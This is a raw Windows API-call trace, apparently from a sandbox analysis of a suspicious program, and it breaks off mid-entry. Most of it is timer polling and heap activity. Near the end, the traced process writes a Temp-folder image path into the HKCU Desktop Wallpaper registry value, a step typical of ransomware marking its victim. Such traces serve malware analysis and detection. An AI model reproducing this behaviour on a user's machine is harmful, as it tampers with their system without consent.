returned 0x48ab1 [0290.613] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.614] Sleep (dwMilliseconds=0xa) [0290.629] timeGetTime () returned 0x48ac0 [0290.629] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.629] Sleep (dwMilliseconds=0xa) [0290.644] timeGetTime () returned 0x48ad0 [0290.644] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.644] Sleep (dwMilliseconds=0xa) [0290.660] timeGetTime () returned 0x48adf [0290.660] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.660] Sleep (dwMilliseconds=0xa) [0290.675] timeGetTime () returned 0x48aef [0290.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.675] Sleep (dwMilliseconds=0xa) [0290.691] timeGetTime () returned 0x48aff [0290.691] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.691] Sleep (dwMilliseconds=0xa) [0290.706] timeGetTime () returned 0x48b0e [0290.707] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.707] Sleep (dwMilliseconds=0xa) [0290.724] timeGetTime () returned 0x48b1e [0290.724] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.724] Sleep (dwMilliseconds=0xa) [0290.738] timeGetTime () returned 0x48b2d [0290.738] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.738] Sleep (dwMilliseconds=0xa) [0290.753] timeGetTime () returned 0x48b3d [0290.753] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.753] Sleep (dwMilliseconds=0xa) [0290.769] timeGetTime () returned 0x48b4d [0290.769] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.769] Sleep (dwMilliseconds=0xa) [0290.784] timeGetTime () returned 0x48b5c [0290.785] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.785] Sleep (dwMilliseconds=0xa) [0290.800] timeGetTime () returned 0x48b6c [0290.800] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.800] Sleep (dwMilliseconds=0xa) [0290.817] timeGetTime () returned 0x48b7b [0290.817] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.818] Sleep (dwMilliseconds=0xa) [0290.831] timeGetTime () returned 0x48b8b [0290.831] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.831] Sleep (dwMilliseconds=0xa) [0290.848] timeGetTime () returned 0x48b9b [0290.849] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.849] Sleep (dwMilliseconds=0xa) [0290.862] timeGetTime () returned 0x48baa [0290.862] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.862] Sleep (dwMilliseconds=0xa) [0290.878] timeGetTime () returned 0x48bba [0290.878] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.878] Sleep (dwMilliseconds=0xa) [0290.898] timeGetTime () returned 0x48bc9 [0290.899] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.899] Sleep (dwMilliseconds=0xa) [0290.909] timeGetTime () returned 0x48bd9 [0290.909] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.910] Sleep (dwMilliseconds=0xa) [0290.925] timeGetTime () returned 0x48be9 [0290.925] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.925] Sleep (dwMilliseconds=0xa) [0290.940] timeGetTime () returned 0x48bf8 [0290.940] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.940] Sleep (dwMilliseconds=0xa) [0290.972] timeGetTime () returned 0x48c17 [0290.972] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.972] Sleep (dwMilliseconds=0xa) [0290.987] timeGetTime () returned 0x48c27 [0290.987] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.987] Sleep (dwMilliseconds=0xa) [0291.003] timeGetTime () returned 0x48c37 [0291.003] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.003] Sleep (dwMilliseconds=0xa) [0291.018] timeGetTime () returned 0x48c46 [0291.018] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.019] Sleep (dwMilliseconds=0xa) [0291.039] timeGetTime () returned 0x48c56 [0291.040] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.040] Sleep (dwMilliseconds=0xa) [0291.052] timeGetTime () returned 0x48c65 [0291.052] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.052] Sleep (dwMilliseconds=0xa) [0291.065] timeGetTime () returned 0x48c75 [0291.065] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.065] Sleep (dwMilliseconds=0xa) [0291.081] timeGetTime () returned 0x48c85 [0291.081] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.081] Sleep (dwMilliseconds=0xa) [0291.096] timeGetTime () returned 0x48c94 [0291.096] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.097] Sleep (dwMilliseconds=0xa) [0291.115] timeGetTime () returned 0x48ca4 [0291.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0291.115] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0291.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0291.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0291.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0291.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0291.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0291.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0291.117] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0291.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0291.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0291.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0291.118] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0291.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0291.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0291.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0291.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0291.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0291.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0291.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0291.120] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0291.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0291.121] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0291.121] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0291.121] RegCloseKey (hKey=0x294) returned 0x0 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0291.122] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0291.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0291.125] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0291.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0291.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0291.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0291.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0291.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0291.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0291.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0291.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0291.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0291.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0291.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0291.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0291.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.131] RtlAllocateHeap 